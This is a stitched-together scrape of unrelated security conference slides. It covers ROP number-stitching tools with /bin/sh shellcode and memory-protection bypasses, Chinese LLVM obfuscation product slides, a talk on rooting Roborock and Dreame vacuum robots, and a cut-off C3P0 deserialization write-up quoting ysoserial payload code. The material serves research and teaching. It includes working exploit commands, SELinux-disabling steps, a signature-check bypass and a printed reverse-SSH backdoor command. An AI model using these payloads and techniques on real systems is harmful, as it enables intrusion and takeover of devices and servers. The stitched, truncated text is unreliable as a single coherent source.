! Tool to find a solution to the coin change problem
! Give it a number, will get you the address of numbers which solve
the coin change problem
! Can also:
! Ignore addresses with null-bytes
! Exclude numbers from the coin change solver
! Print all addresses pointing to a number
! …
Introducing Ropnum
! Find me:
! The address of numbers…
! In the segment containing the .text section
! Which added together solve the coin change problem (i.e.: 0x01020304)
Usage
someone@something:~/somewhere$ ropnum.py -n 0x01020304 -S -s .text hw 2> /dev/null
Using segments instead of sections to perform number lookups.
Using sections [.text] for segment lookup.
Found loadable segment starting at [address 0x08048000, offset 0x00000000]
Found a solution using 5 operations: [16860748, 47811, 392, 104, 5]
0x08048002 => 0x0101464c 16860748
0x0804804c => 0x00000005        5
0x080482f6 => 0x00000068      104
0x08048399 => 0x0000bac3    47811
0x08048500 => 0x00000188      392
! Now you can use an accumulating gadget on the found addresses
! add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;;
! By controlling the value addressed by ebx, you control eax
Ropnum continued
someone@something:~/somewhere$ ropnum.py -n 0x01020304 -S -s .text hw 2> /dev/null
Found a solution using 5 operations: [16860748, 47811, 392, 104, 5]
0x08048002 => 0x0101464c 16860748
0x0804804c => 0x00000005        5
0x080482f6 => 0x00000068      104
0x08048399 => 0x0000bac3    47811
0x08048500 => 0x00000188      392
someone@something:~/somewhere$ python -c 'print hex(0x00000188+0x0000bac3+0x00000068+0x00000005+0x0101464c)'
0x1020304
Putting it together
! Cut and order 4 byte shellcode chunks
! Add numbers found in memory together until you reach a chunk
! Once a chunk is reached, dump it to a stack frame
! Repeat until shellcode is complete
! Transfer control to shellcode
! Get it at https://github.com/alexmgr/numstitch
Summary
! What it does:
! Takes an input shellcode, and a frame address
! Takes care of the tedious details (endianess, 2’s complement, padding, … )
! Spits out some python code to generate your payload
! Additional features:
! Add an mprotect RWE stub frame before your stack
! Start with an arbitrary accumulator register value
! Lookup numbers in section or segments
Introducing Ropstitch
! The fake stack lives in a RW section
! You need to make that page RE
! Mprotect allows to change permissions at runtime
! The mprotect stub will change the permissions of the page to allow
shellcode execution
! Mprotect(page base address, page size (0x1000), RWE (0x7))
Why do you need an mprotect stub
! Generate a python payload:
! To copy a /bin/sh shellcode:
! To a fake frame frame located at 0x08049110 (.data section)
! Appending an mprotect frame (default behaviour)
! Looking up numbers in RO segment
! In binary abinary
Example usage
someone@something:~/somewhere$ ropstitch.py -x "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80" -f 0x08049110 -S -s .text -p abinary 2> /dev/null
! The tool will spit out some python code, where you need to add your
gadget addresses
! Then run that to get your payload
! Output is too verbose. See an example and further explanations on
numstitch_details.txt (Defcon CD) or here:
https://github.com/alexmgr/numstitch
Example tool output
GDB output
gdb-peda$ x/16w 0x804a11c
0x804a11c: 0xb7f31e00 0x00000000 0x00000000 0x00000000
0x804a12c: 0x00000007 0x00000000 0x00000000 0x00000000
0x804a13c: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a14c: 0x00000000 0x00000000 0x00000000 0x00000000
gdb-peda$ # Writing int 0x80. Notice that the numbers are added in increasing order:
0x804a11c: 0xb7f31e00 0x00000000 0x00000000 0x00000000
0x804a12c: 0x00000007 0x00000000 0x00000000 0x00000000
0x804a13c: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a14c: 0x00000000 0x00000080 0x00000000 0x00000000
gdb-peda$ # Writing mprotect page size (0x1000). Notice that the numbers are added in increasing order:
0x804a11c: 0xb7f31e00 0x00000000 0x00000000 0x00001000
0x804a12c: 0x00000007 0x00000000 0x00000000 0x00000000
0x804a13c: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a14c: 0x00000000 0x00000080 0x00000000 0x00000000
gdb-peda$ c 10
gdb-peda$ # later execution (notice the missing parts of shellcode, which will be filled in later, once eax reaches a slice value):
0x804a11c: 0xb7f31e00 0x0804a130 0x0804a000 0x00001000
0x804a12c: 0x00000007 0x00000000 0x2d686652 0x52e18970
0x804a13c: 0x2f68686a 0x68736162 0x6e69622f 0x5152e389
0x804a14c: 0x00000000 0x00000080 0x00000000 0x00000000
gdb-peda$ # end result (The shellcode is complete in memory):
0x804a11c: 0xb7f31e00 0x0804a130 0x0804a000 0x00001000
0x804a12c: 0x00000007 0x99580b6a 0x2d686652 0x52e18970
0x804a13c: 0x2f68686a 0x68736162 0x6e69622f 0x5152e389
0x804a14c: 0xcde18953 0x00000080 0x00000000 0x00000000
Pros and cons
! Pros:
! Can encode any shellcode (no null-byte problem)
! Lower 2 bytes can be controlled by excluding those values from the
addresses
! Not affected by RELRO, ASLR or X^W
! Cons:
! Payloads can be large, depending on the availability of numbers
! Thus requires a big stage-0, or a gadget table
Number stitching
Further usage
! What if the value of eax changes between runtimes?
! In stdcall convention, eax holds the return value of a function call
! Just call any function in the PLT
! There is a good chance you control the return value that way
Initialize eax
! Number stitching can also be used to load further gadgets instead of
a shellcode
! Concept of a gadget table
! Say you need:
! Pop ecx; ret;
=> 59 c3
! Pop ebx; ret;
=> 5b c3
! mov [ecx] ebx; ret;
=> 89 19 c3
! Your shellcode becomes: “\x59\xc3\x5b\xc3\x89\x19\xc3”
Shrink the size of the stage-0
! Number stitching can transfer those bytes to memory
! ropstitch can change the memory permissions with the mprotect
stub
! You can then just call the gadgets from the table as if they were part
of the binary
! You have the ability to load any gadget or byte in memory
! This is not yet automated in the tool
Gadget table
Future work
! Search if there are numbers in memory not subject to ASLR:
! Check binaries with PIE enabled to see if anything comes up
! By definition, probably won’t come up with anything, but who knows?
! Search for gadgets in new versions of libc/gcc. Seems difficult, but
might yield a new approach
General
! Get dynamic programming approach to work with large numbers:
! Challenging
! 64 bit support. Easy, numbers are just bigger. Mprotect stack might
be harder because of the different ABI
! Introduce a mixed approach:
! String copying for bytes available
! Number stitching for others
! Maybe contribute it to some rop tools (if they’re interested)
! Simplify the concept of gadget tables in the tool
Tooling
Contact details
! [email protected]
! https://github.com/alexmgr/numstitch
Alex Moneger
Thank you! | pdf |
Liu Baijiang (刘柏江)
Founder and CTO of Kiwisec (几维安全)
The Art of LLVM Compiler Protection in the IoT Era
Agenda
01 In a world where everything is connected, code security comes first
02 Traditional code protection; LLVM-based secure compilers
03 Obfuscation, block scheduling, code virtualization
With everything connected, security comes first
• Physical security: prevent devices from being lost or stolen
• Business security: prevent leakage of users' private data
• System security: prevent low-level vulnerabilities from being exploited maliciously
• Policy security
With everything connected, code security comes first
• Anti-reversing: prevent core algorithms from being reconstructed
• Cooperation: strengthen policy security
• Raising the bar: increase the cost of cracking and keep novice reverse engineers out
• Buying time: increase the difficulty of cracking and extend the time it takes, winning a longer favorable window for operations
The IoT era is about to begin
• Android Things: lets you build smart, connected devices for a wide range of consumer, retail and industrial applications.
• AliOS Things: a lightweight embedded operating system for the IoT, widely applicable to smart homes, smart cities, new mobility and other domains.
• DuerOS: broadly supports phones, TVs, speakers, cars, robots and many other kinds of hardware.
• IoT.MI: the Xiaomi IoT developer platform, targeting smart homes, smart appliances, health wearables, automotive and other domains.
More and more chip architectures
• Internet (Windows/MacOS/Linux): x86, x86-64
• Mobile Internet (iOS/Android): x86, arm, arm64
• IoT (Android/AliOS Things): x86, x86-64, arm, arm64, mips, mips64, stm32, avr, bpf, hexagon, lanai, nvptx, riscv, sparc, systemz, csky
Less and less runtime memory
• Internet (Windows/MacOS/Linux): 2GB-16GB
• Mobile Internet (iOS/Android): 512MB-8GB
• IoT (Android/AliOS Things): 256KB-1GB
The IoT operating system runtime environment
• Runs on a wide variety of chip architectures
• Hardware performance is low due to power constraints
• Runs in environments that generally have little memory
黑盒代码加密
处理的对象是最终的软件执行体,比
如Windows的EXE、Android的SO
以及DEX
白盒代码加密
处 理 的 对 象 是 源 代 码 , 比 如
C/C++/Objective-C / Swif t
这 类 语 言 的 源 代 码 文 件
黑盒代码加密的应用
比 如 适 用 于 Windows 、
Linux、Android的UPX壳
比如利用x86指令集的可变
长特性增加误导反汇编程序
的垃圾指令
比 如 Windows 非 常 著 名 的
VMProtect
比如Android的DEX整体加
解密、类抽取
A
C
B
D
加壳
加花指令
加虚拟机
劫持
运行时
黑盒代码加密的局限
可移植性差
兼容性差
很难对多端且同源的代码做一致性的保护
芯片架构不兼容、内存需求显著增加,
很难适应新的像IoT这样的平台
对于像Android这类高碎片化的平台,干预
运行时意味着兼容性极差
对于像iOS这类完全封闭的平台,干预运行
时意味着方案没法工作
LLVM编译器登场
前端
源代码
LLVM是模块化、可复用的编译器工具链集合,最初是伊利诺伊大学的一个研究项目,
其目标是提供一种现代的,基于SSA的编译策略,能够支持任意编程语言的静态和动态
编译。
IR处理
LLVM-IR
后端
LLVM-MIR
目标文件
Object
LLVM-IR
函数
模块
IR指令
基本块
LLVM提供了完整的IR文件操作API,可以对IR文件的模块、函数、基本块、IR指令做任意修改。
||
架构信息
全局数据
函数申明
函数实现
编译元数据
||
函数申明
变量申明
代码块
||
IR指令序列
||
算术指令
逻辑指令
控制指令
......
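As a concrete illustration of what this IR layer looks like (a generic example, not output from KiwiVM), a trivial C function `int add(int a, int b) { return a + b; }` lowers to roughly the following LLVM-IR: a module containing one function, made of a single basic block of IR instructions.

```llvm
define i32 @add(i32 %a, i32 %b) {
entry:
  %sum = add nsw i32 %a, %b    ; arithmetic IR instruction
  ret i32 %sum                 ; control IR instruction
}
```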
Unlocking the potential of LLVM-IR
• Architecture-independent: can target any chip architecture
• Rich set of techniques: can satisfy any required security level
• Function-level granularity: can fit low-memory runtime environments
Basic protection: original control-flow graph vs. obfuscated control-flow graph (figure)
Advanced protection: original control-flow graph vs. block-scheduled control-flow graph (figure)
Code virtualization: KiwiVM
The KiwiVM code-virtualization compiler is implemented in the LLVM middle layer. By designing a proprietary, confidential virtual CPU instruction set, it encrypts and translates the original CPU instructions into virtual instructions that only the KiwiVM interpreter can execute, completely hiding a function's logic so the code cannot be reverse engineered.
• Virtual CPU execution
• Function-level protection granularity
• All platforms, all architectures
• 100% compatibility
LLVM-BC
源文件
Clang
KiwiVM
源文件
KiwiVM的中心思想是利用LLVM-BC编码成自定义虚拟CPU的指令集和元数据,包括指令集数据、重定位数据、函数调用
签名数据等。
||
C
C++
ObjC
||
BC函数列表
||
功能等价的C
||
生成最终的
Obj文件
KiwiVM translation example
Flagship protection: original control-flow graph vs. virtualized control-flow graph (figure)
混淆
块调度
代码虚拟化
结束之前
几维安全编译器产品简介
级别
功能
平台
混淆编译器
初级
代码膨胀
乱序执行
iOS、Android、IoT
块调度编译器
高级
逻辑断链
函数调用隐藏
iOS、Android、IoT
虚拟化编译器
旗舰级
逻辑隐藏
虚拟CPU执行
iOS、Android、IoT
Thank you!
Robots with lasers and cameras (but no security):
Liberating your vacuum from the cloud
DEFCON 29 – Dennis Giese
(08.08.2021) DEFCON 29 – Dennis Giese
About me
• PhD student at Northeastern University, USA
– Working with Prof. Guevara Noubir @Khoury
– Research field: Wireless and embedded security&privacy
• Interests: Reverse engineering of interesting devices
– Smart Home Devices, mostly vacuum cleaning robots
– Current research: Smart Speakers
Most recent work
• “Amazon Echo Dot or the reverberating secrets of IoT devices”
• Authors: Dennis Giese and Guevara Noubir
• Published: ACM WiSec 2021
https://dontvacuum.me/papers/ACMWisec-2021/
Goals
• Get an overview over the development of vacuum robots
– Focus: Roborock and Dreame
• Learn about vulnerabilities and backdoors
• Understand methods to root current robots
https://www.dreame-technology.com/
https://www.roborock.com
Side note: Generally, a
friendly relationship with
vendors is maintained
MOTIVATION
Why do we want to root devices?
• Play with cool hardware
• Stop devices from constantly phoning home
• Use custom Smart Home Software
• Verification of privacy claims
Why do we not trust IoT?
• Devices are connected to the home network
• Communication to the cloud is encrypted, content unclear
• Developing secure hardware and software is hard
• Vendor claims contradict each other
“Nothing is sent to the cloud”?
https://global.roborock.com/pages/roborock-s6-maxv
… but you can access the camera?
https://global.roborock.com/pages/roborock-s6-maxv
Problem of used devices
• Used devices might be problematic
– Previous owner installed rootkit
– New owner cannot verify software
– Result: Device might behave maliciously in your network
• Rooting is the only way to verify that a device is „clean“
A LOOK IN THE PAST:
THE GOOD OLD TIMES
First work in 2017
•
Work together with Daniel Wegemer
•
Xiaomi Vacuum Robot / Roborock S5
•
Findings:
– Firmware images: unsigned and encrypted with weak key
– Custom firmware could be pushed from local network
•
Result:
– Rooting without disassembly
– Development of custom Software and Voice packages
•
Publication: 34C3 (2017) and DEF CON 26 (2018)
rockrobo.vacuum.v1 (End of 2016), roborock.vacuum.s5 (End of 2017)
https://dontvacuum.me/talks/DEFCON26/DEFCON26-Having_fun_with_IoT-Xiaomi.html
Recap Hardware V1 / S5
•
Quadcore ARM
•
512 Mbyte RAM
•
4 GByte eMMC Flash
•
Sensors:
– LiDAR
– IR
– Ultrasonic
•
Debug ports:
– USB
– UART
512 MB RAM
Quadcore
SOC
4GB
eMMC
Flash
WiFi Module
STM32 MCU
Recap Software V1 / S5
•
Ubuntu 14.04.3 LTS (Kernel 3.4.xxx)
–
Mostly untouched
–
Obfuscated “root” password
•
Player 3.10-svn
–
Open-Source Cross-platform robot device interface & server
•
Proprietary software (/opt/rockrobo)
–
Custom adbd-version
–
Watchdog (enforces copy protection)
–
Logging tool (uploading a lot of data to the cloud)
•
iptables firewall enabled (IPv4!)
–
Blocks Port 22 (SSHd) + Port 6665 (player)
–
Fail: IPv6 not blocked at all
THE FORCE STRIKES BACK:
LOCKING DOWN THE DEVICES
First steps in locking down
• Newer Roborock S5 firmware: local updates blocked
• With introduction of Roborock S6 (2019):
– Signed firmware and voice packages
– Each model uses different encryption keys
– Signed configuration files to enforce region locks
– However: Hardware remains mostly the same
• Disassembly of devices was required
Keeping rooting methods secret
• Roborock S6 rooted in the first 2 weeks after release
• Developed methods:
– Extraction of obfuscated root password via UART
– Single user boot via U-Boot
• Methods were not published for some time
• Assumption: Roborock would lock them down in newer
devices
Getting access via UART
Observations
• Every time we publish a method, it gets blocked
• Examples for blocking:
– Local updates (2017):
• Blocked via firmware updates in 2018
– Root password method (2019):
• Blocked for newly produced devices in 2019
– U-Boot bypass (2020):
• Blocked for new models in 2020
All currently public
methods are blocked ☹
DEVELOPMENT OF ROBOROCK MODELS
Roborock device development
2016
2017
2019
2020
2021
2018
512
MB
RAM
256
MB
RAM
>= 4
GB
Flash
<= 512
Mbyte
Flash
1GB
RAM
Contains only global models
Xiaomi
V1
Roborock
S5
Roborock
S6
Xiaomi
M1S
Roborock
S6 Pure
Roborock
S6 MaxV
Roborock
S7
Roborock
S4 Max
Roborock
S4
Roborock
S5 Max
Images: Xiaomi
Roborock device development
2016
2017
2019
2021
2018
Xiaomi
V1
512
MB
RAM
256
MB
RAM
>= 4
GB
Flash
<= 512
Mbyte
Flash
1GB
RAM
Contains only global models
Roborock
S5
Roborock
S6
Xiaomi
M1S
Roborock
S6 Pure
Roborock
S6 MaxV
Roborock
S7
Roborock
S4 Max
Roborock
S4
Roborock
S5 Max
Images: Xiaomi
USD 380
2020
USD 280
USD 250
USD 550
USD 430
USD 430
USD 200
USD 700
USD 650
USD 230
Roborock device development
Xiaomi
V1
512
MB
RAM
256
MB
RAM
>= 4
GB
Flash
<= 512
Mbyte
Flash
1GB
RAM
Contains only global models
Images: Xiaomi
Roborock
S6 Pure
USD 380
Roborock
S5
USD 280
Roborock
S4
USD 250
Roborock
S5 Max
USD 550
Roborock
S4 Max
USD 430
Roborock
S6
USD 430
USD 200
Roborock
S6 MaxV
USD 700
Roborock
S7
USD 650
Xiaomi
M1S
USD 230
$$$
Roborock device development
2016
2017
2019
2020
2021
2018
Xiaomi
V1
512
MB
RAM
256
MB
RAM
>= 4
GB
Flash
<= 512
Mbyte
Flash
1GB
RAM
Contains only global models
Roborock
S5
Roborock
S6
Xiaomi
M1S
Roborock
S6 Pure
Roborock
S6 MaxV
Roborock
S7
Roborock
S4 Max
Roborock
S4
Roborock
S5 Max
Images: Xiaomi
Hardware gets weaker,
despite devices getting more
expensive
Conclusion
ROBOROCK CAMERA ROBOTS
Xiaomi M1S
•
Released Q2/2019
•
SoC: Rockchip RK3326 (64-Bit ARM Quadcore)
•
RAM: 512 Mbyte
•
Flash: 4GByte eMMC
•
Sensors:
– LiDAR
– Up-facing B/W Camera
– Ultrasonic distance sensor
– IR sensors
Find more teardown pictures here:
https://dontvacuum.me/teardowns/roborock.vacuum.m1s/
Video perspective of M1S robot
Recorded with GStreamer on robot (/dev/video1)
Roborock S6 MaxV Hardware
•
Released Q2/2020
•
SoC: Qualcomm APQ8053 (64-Bit ARM Octocore)
•
RAM: 1 GByte
•
Flash: 4GByte eMMC
•
Sensors:
– LiDAR
– 2x FullHD color front cameras (with IR)
– IR sensors
•
Water Tank + Pump
Find more teardown pictures here:
https://dontvacuum.me/teardowns/roborock.vacuum.a10/
SoC
eMCP
Roborock S6 MaxV Cameras
Stereo Camera
Infrared
Illumination
Screenshots from the Roborock app
Xiaomi M1S/Roborock S6 MaxV Software
• OS: Android
• Similar software as previous models
• Cameras can be accessed via video4linux subsystem
• Used libraries
– OpenCV
– OpenCL
– Tensorflow Lite
Security measures
• Secure boot
– Replay-Protected-Memory-Block (RPMB) enabled
• DM-Verity
– System partition integrity protected
• SELinux enabled and enforced
• LUKS encrypted partitions
– All application specific programs protected
– Keys stored in OPTEE / ARM TrustZone
Security measures
• Signed ELF-Binaries and kernel-based
verification
• Signed and encrypted Firmware updates
– Keys different per firmware version
– Master keys stored in OPTEE / TrustZone
• IPtables binary cannot flush/delete rules
• Locked UART
Interesting partitions
Label | Content | Mountpoint | LUKS | DM-verity
app | device.conf (DID, key, MAC), adb.conf, vinda | /mnt/default/ | ✗ | ✗
system_a | copy of OS (active by default) | / | ✗ | ✓
system_b | copy of OS (passive by default) | – | ✗ | ✓
app_a | Robot application and libraries (active) | /opt | ✓ | ✗
app_b | Robot application and libraries (passive) | – | ✓ | ✗
reserve | config + calibration files | /mnt/reserve/ | ✓ | ✗
rtmpdata | logs, maps | /mnt/data | ✓ | ✗
NEW ROOTING METHODS (ROBOROCK)
Unrooted robots
• Roborock S7
• Xiaomi M1S
• Roborock S6 MaxV
Unrooted robots
➢ Roborock S7
• Xiaomi M1S
• Roborock S6 MaxV
Roborock S7 rooting
•
Same mainboard as S5 Max, S6 Pure, etc.
•
Problems:
– U-Boot patched --> UART method does not work
– RootFS is a read-only SquashFS
•
New Method: FEL rooting
– Does not require soldering
– Does require disassembly
– Automatically patches RootFS and enables SSH
– Applies to all current NAND-based Roborock models
PCB reverse engineering
Old Method:
UART
•
UART pins were known before
– Useless after blocking
•
Allwinner SOCs have FEL mode
– Low level mode
– Allows flashing of device
– Burned in SOC ROM
•
Idea: boot custom OS via FEL
•
Typical methods to trigger FEL:
– Disable Flash IC
– Pull BOOT Mode / FEL pin
https://linux-sunxi.org/FEL
PCB reverse engineering
New Method:
FEL
SOC
Destructive
Desoldering
Probing
Booting via FEL
•
Challenge: NAND support proprietary
•
Approach:
– Extract kernel config from Rockrobo kernel
– Create InitramFS with Dropbear, SSH keys and tools
– Compile minimal Kernel using public Nintendo NES Classic sources
– Create custom U-Boot version with extracted Roborock config
– Trigger FEL Mode by shorting TPA17 to GND
– Load U-Boot, Kernel and InitramFS into RAM via USB
– Boot and automatically patch the SquashFS RootFS
https://www.nintendo.co.jp/support/oss/data/SuperNESClassicEdition_OSS.zip
https://builder.dontvacuum.me/fel-ressources
FEL image patching process
•
Boot into FEL image
•
Decompress SquashFS
•
Patch RootFS image
– Install “authorized_keys” and custom Dropbear SSH server
•
Compress SquashFS image
•
Overwrite partition with new image
•
Result: SSH access and root
https://builder.dontvacuum.me/fel-ressources
https://builder.dontvacuum.me/howtos
FEL rooting advantages
•
No soldering required
•
Simple process
•
Allows to restore bricked devices
•
Can be used for all Allwinner-based devices
https://builder.dontvacuum.me/fel-ressources
Unrooted robots
✓ Roborock S7
➢ Xiaomi M1S
➢ Roborock S6 MaxV
Xiaomi M1S / S6 MaxV rooting
•
Problems:
– All ports closed or firewalled
– Filesystems encrypted or integrity protected
– USB interface protected with custom adbd
•
Idea: layered approach
– Break in via USB
– Disable SELinux
– Patch application partition
•
• Note: While it's possible, it may be out of reach for many people ☹
Level 1: Get ADB shell
•
ADB uses special authentication
– Challenge-Response authentication
– Based on VINDA secret (which we don’t have)
– Mode controlled by config file (adb.conf)
– Relevant files stored on “default” partition and not protected
•
Idea:
– Connect to Flash via ISP or de-solder it
– Extract or create VINDA secret
– Use tool to compute challenge response
https://builder.dontvacuum.me/vinda
ISP access Xiaomi M1S
ISP access Roborock S6 MaxV
D5
D0
D2
D3
D7
D1
D4
CMD
D6
CAUTION: If you don't know what
you're doing, you're likely to brick
your device
Recommended Method
•
ISP access can be tricky
•
Usage of an adapter might be easier
– Requires reflow soldering
– Re-balling equipment needed
Level 1 result
•
We set vinda to “UUUUUUUUUUUUUUUU”
1. Get serial number
2. Get challenge
3. Compute response using
serial number and challenge
4. Execute commands
Many thanks to Erik Uhlmann for his support
https://builder.dontvacuum.me/vinda
Level 2: Disable SELinux
•
We have shell access, but SELinux is enforced
– Network access is blocked
– Access to /dev is blocked
– However: bind-mounts and “kill” is allowed
•
Idea:
– Copy /opt/rockrobo/miio to /tmp/miio
– Replace “miio_client” with bash script
– Bind-mount /tmp/miio to /opt/rockrobo/miio
– Kill “miio_client” -> bash script gets executed
Level 2 result
• Watchdog will restart miio_client if it gets killed
# getenforce
Enforcing
# ps
PID USER TIME COMMAND
…
9751 root 26:04 miio_client -d /mnt/data/miio -l 2
….
# cp -r /opt/rockrobo/miio /tmp/
# echo '#!/bin/sh' > /tmp/miio/miio_client
# echo 'echo 0 > /sys/fs/selinux/enforce' >> /tmp/miio/miio_client
# echo 'sleep 30' >> /tmp/miio/miio_client
# mount -o bind /tmp/miio /opt/rockrobo/miio
# kill 9751
# getenforce
Permissive
1. Get the current mode of SELinux
2. Find PID of miio_client process
3. Copy miio directory to /tmp
4. Create bash script in place if miio_client
to disable SELinux
5. Bind-mount modified directory to /opt/
rockrobo/miio
6. Kill miio_client process
7. Enjoy
Level 3: Modify application partition
• We have now full root, but only temporary
– “app” partition not integrity protected
– By modification of scripts
• disable SELinux
• start Dropbear on a different port
– Limitation: ELF binaries need to be signed
• “Backdoor”: any file named “librrafm.so” is whitelisted
• Symbolic links work ;)
Many thanks to Erik Uhlmann for his support
Level 3 result
• We want to run Valetudo on our robot
/tmp # wget https://github.com/Hypfer/Valetudo/.../valetudo-armv7
/tmp # ./valetudo-armv7
Segmentation fault
/tmp # dmesg
....
[1744981.268689] __verify_elf__: (valetudo-armv7)sign verify fail, target section non exist!
[1744981.268722] [verify_elf]:(valetudo-armv7)signature verify fail!
/tmp # mv valetudo-armv7 librrafm.so
/tmp # ./librrafm.so
[2021-06-30T03:24:39.664Z] [INFO] Autodetected RoborockS6MaxVValetudoRobot
[2021-06-30T03:24:39.736Z] [INFO] Starting Valetudo 2021.06.0
[2021-06-30T03:24:39.742Z] [INFO] Configuration file: /tmp/valetudo_config.json
[2021-06-30T03:24:39.743Z] [INFO] Logfile: /tmp/valetudo.log
[2021-06-30T03:24:39.744Z] [INFO] Robot: Beijing Roborock Technology Co., Ltd. S6 MaxV
1. Download
Valetudo
2. Realize it doesn’t
work because of
custom ELF
signature
3. Rename Valetudo
to ”librrafm.so”
4. Enjoy working
Valetudo
Other ideas for M1S / S6 MaxV
• Ask OPTEE nicely to decrypt firmware updates
• Access cameras directly (via GStreamer)
• Extract Machine Learning Models
• Find all the backdoors
Summary Roborock
• We have an easy method to root S7 and other models
• We have root for Xiaomi M1S and Roborock S6 MaxV
– However: Method is dangerous and will brick your device
– Only feasible if you have equipment and experience
– Regard rooting only as a proof-of-concept
• Recommendation:
– avoid new Roborock models if you want root
A NEW PLAYER: DREAME
A new alternative
•
First model released in 2019
•
OEM products for Xiaomi
•
Models:
– Xiaomi 1C and Dreame F9 (VSLAM)
– Dreame D9 (LiDAR)
– Xiaomi 1T (VSLAM + ToF)
– Dreame L10 Pro (LiDAR + Line Laser + Camera)
•
Allwinner SoC
•
OS based on Android
•
Robot software: AVA
Pictures of Xiaomi 1T (top), Dreame D9 (bottom)
https://dontvacuum.me/robotinfo/
Video perspective Xiaomi 1C/Dreame F9
Recorded with camera_demo and AVA recording commands
Time-of-Flight Camera Xiaomi 1T
Point cloud obtained by AVA commands
Line Laser Dreame L10 Pro
Recorded with activated line laser from /dev/video1
ROOTING DREAME
Easy opening and root
•
First root: December 2019 (1C)
•
All models have the same connector
– Can be accessed without breaking warranty seals
•
Extracted key material and firmware
•
Reverse engineered flashing via FEL
– Usage of Banana Pi tools
– Flashing with PhoenixUSB (Windows only ☹)
https://github.com/BPI-SINOVOIP/BPI-M3-bsp
Debug pinout
Front
Boot_SEL
RX
TX
D+
D-
VBUS
(Do not
connect)
GND
•
Debug interface
–
2x8 pins
–
2mm pitch size
Warning:
2mm pitch size is way smaller
than the usual 2.54 mm
Warning:
Make sure you connect to the
correct pins!
Rooting with custom PCBs
For the Gerber files (thanks to Ben Helfrich):
https://builder.dontvacuum.me/dreameadapter
Examples of connections
USB
UART
Marker
(needs to be on the right)
BOOT_SEL
Front
For the Gerber files (thanks to Ben Helfrich):
https://builder.dontvacuum.me/dreameadapter
INTERESTING FINDINGS
AutoSSH backdoor
• Trigger reverse SSH shell
–
sshpass -p xxx ssh -p 10022 -o StrictHostKeyChecking=no -fCNR last-4-digits-of-sn:127.0.0.1:22
[email protected]
• Hard coded credentials to server
– User has sudo rights
– Server used for development
Debug Scripts
•
Startup debug script
– Unencrypted ftp download from personal developer NAS
•
Log uploads
– With admin credentials
Obfuscated Root Password
• Root password of device is derived as follows:
– Base64(SHA1(Serial number))
• Password for debug firmwares (globally):
– #share!#
Lots of “chatty” functions
• Debug functions
– Recording and upload of pictures
– Recording and upload of camera recordings
• Device produces lots of log-files
• Only way to prevent uploads: rooting
Summary Dreame
• Devices are cheaper than Roborock
• Performant Hardware
• Valetudo support
– Full support since April 2021
• All current models can be rooted without soldering
– Applies to all devices released before Aug 2021
• Questionable remains in Software
https://valetudo.cloud/
DUSTBUILDER
Dustbuilder
• Website for building your own custom robot firmwares
– Reproducible builds
– Easy to use
– Works for Dreame, Roborock and Viomi
• Alternative to local building
– All tools are still published on Github
• URL: http://builder.dontvacuum.me/
Acknowledgements
• Ben Helfrich
• Carolin Gross
• Cameron Kennedy
• Daniel Wegemer
• Erik Uhlmann
• Guevara Noubir
• Sören Beye
Contact:
See: http://dontvacuum.me
Telegram: https://t.me/dgiese
Twitter: dgi_DE
Email: [email protected] | pdf |
S-C3P0 Deserialization
Background
This started from a technique for exploiting fastjson without outbound network access: combining C3P0 with ROME in a second deserialization to inject an in-memory shell.
How the vulnerability works
The ysoserial source
First, let's look at how ysoserial builds the chain and generates the payload. The gadget chain:
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject -
> com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject -
> com.sun.jndi.rmi.registry.RegistryContext->lookup
package ysoserial.payloads;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/**
* com.sun.jndi.rmi.registry.RegistryContext->lookup
* com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject
* com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject
*
* Arguments:
* - base_url:classname
* Yields:
* - Instantiation of remotely loaded class
* @author mbechler
*
*/
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-
java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0 implements ObjectPayload<Object> {
To serialize, ysoserial first creates a PoolBackedDataSource object, then uses reflection to replace its connectionPoolDataSource field with an instance of PoolSource. Let's walk through that serialization process.
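The reflection trick — forcing a non-serializable object into a private field — is the standard `getDeclaredField`/`setAccessible` pattern behind yso's `Reflections.getField(...).set(...)`. Here is a minimal, stdlib-only sketch; the `Base` class and its field are stand-ins for `PoolBackedDataSourceBase`, not c3p0's real classes:

```java
import java.lang.reflect.Field;

public class ReflectionSetSketch {

    // Stand-in for PoolBackedDataSourceBase with its private field.
    static class Base {
        private Object connectionPoolDataSource;
    }

    // Overwrite the private field and return what is now stored there,
    // mirroring Reflections.getField(...).set(...) from ysoserial.
    static Object overrideField(Base target, Object value) {
        try {
            Field f = Base.class.getDeclaredField("connectionPoolDataSource");
            f.setAccessible(true);
            f.set(target, value);
            return f.get(target);
        } catch (ReflectiveOperationException e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(overrideField(new Base(), "attacker-controlled PoolSource stand-in"));
    }
}
```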
Serialization process
public Object getObject ( String command ) throws Exception {
int sep = command.lastIndexOf(':');
if ( sep < 0 ) {
throw new IllegalArgumentException("Command format is: <base_url>:
<classname>");
}
String url = command.substring(0, sep);
String className = command.substring(sep + 1);
PoolBackedDataSource b =
Reflections.createWithoutConstructor(PoolBackedDataSource.class);
Reflections.getField(PoolBackedDataSourceBase.class,
"connectionPoolDataSource").set(b, new PoolSource(className, url));
return b;
}
